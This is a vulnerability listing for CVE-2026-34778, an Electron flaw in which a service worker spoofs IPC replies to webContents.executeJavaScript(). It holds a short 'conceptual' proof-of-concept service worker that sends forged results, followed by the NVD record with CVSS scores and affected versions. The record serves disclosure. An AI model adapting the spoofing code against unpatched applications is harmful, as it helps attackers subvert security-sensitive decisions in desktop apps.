CVE-2026-34778

// Conceptual PoC for Service Worker IPC Spoofing // This is a simplified representation based on the vulnerability description. self.addEventListener('install', (event) => { self.skipWaiting(); }); self.addEventListener('activate', (event) => { event.waitUntil(self.clients.claim()); }); // Intercepting internal IPC messages (Conceptual) // In a real scenario, the attacker would need to target the specific IPC channel // used by webContents.executeJavaScript(). self.addEventListener('message', (event) => { // Check if the message corresponds to the internal IPC channel for executeJavaScript if (event.data && event.data.channel === 'ELECTRON_INTERNAL_RENDERER_EXECUTE_JAVASCRIPT') { // Send a spoofed reply to the main process // This overwrites the legitimate result with attacker-controlled data event.ports[0].postMessage({ result: true, // Spoofed success result value: 'ATTACKER_CONTROLLED_DATA' }); } }); // Note: The actual internal channel names and mechanisms are abstracted here.

{"cve": {"id": "CVE-2026-34778", "sourceIdentifier": "[email protected]", "published": "2026-04-04T00:16:19.060", "lastModified": "2026-04-20T14:22:54.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to versions 38.8.6, 39.8.1, 40.8.1, and 41.0.0, a service worker running in a session could spoof reply messages on the internal IPC channel used by webContents.executeJavaScript() and related methods, causing the main-process promise to resolve with attacker-controlled data. Apps are only affected if they have service workers registered and use the result of webContents.executeJavaScript() (or webFrameMain.executeJavaScript()) in security-sensitive decisions. This issue has been patched in versions 38.8.6, 39.8.1, 40.8.1, and 41.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-290"}, {"lang": "en", "value": "CWE-345"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "38.8.6", "matchCriteriaId": "9CE003A2-03CC-4355-AA17-2CBD204EC6C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "39.0.0", "versionEndExcluding": "39.8.1", "matchCriteriaId": "8F28D187-306E-4C9D-ADED-56DD79B04AF3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "40.0.0", "versionEndExcluding": "40.8.1", "matchCriteriaId": "A8E19E38-B08F-4075-A564-E14DC3F54078"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:alpha1:*:*:*:node.js:*:*", "matchCriteriaId": "A20225D6-F435-4D09-962D-B162F521B6AD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:alpha2:*:*:*:node.js:*:*", "matchCriteriaId": "33712802-EB60-4E9A-83B8-9F2320B70CB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:alpha3:*:*:*:node.js:*:*", "matchCriteriaId": "9D0A9142-54FE-47BB-9FEB-5E97528E28FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:alpha4:*:*:*:node.js:*:*", "matchCriteriaId": "9E1D191F-DEAE-4DB3-9822-F31AF9FE3BAC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:alpha5:*:*:*:node.js:*:*", "matchCriteriaId": "45A8192F-3D2C-4987-9BBE-7ECC3F71965D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:alpha6:*:*:*:node.js:*:*", "matchCriteriaId": "EEA1A2E5-03DB-46CB-8427-7F31A8A7CE1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta1:*:*:*:node.js:*:*", "matchCriteriaId": "B2DFCE75-BD3F-4537-B5B8-14097E262EA2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta2:*:*:*:node.js:*:*", "matchCriteriaId": "BC346E25-EA43-4615-8CDB-16D15D46E4FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta3:*:*:*:node.js:*:*", "matchCriteriaId": "FA5B3C00-CAFC-4995-BF35-9920F3039E77"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta4:*:*:*:node.js:*:*", "matchCriteriaId": "3672F3FB-6B5E-40FD-8A92-CB4DD6BC6A93"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta5:*:*:*:node.js:*:*", "matchCriteriaId": "9EE4F8AE-21D2-4815-85B7-B7ECCC0D5059"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta6:*:*:*:node.js:*:*", "matchCriteriaId": "D195760C-7DD9-4259-9042-EDE65AEAC1D6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta7:*:*:*:node.js:*:*", "matchCriteriaId": "B370859F-24D3-4B25-B580-1A5B6DB94BFE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:electronjs:electron:41.0.0:beta8:*:*:*:node.js:*:*", "matchCriteriaId": "7F47CFAE-9744-4B54-B7E4-BB8E4346FDBA"}]}]}], "references": [{"url": "https://github.com/electron/ele ... (truncated)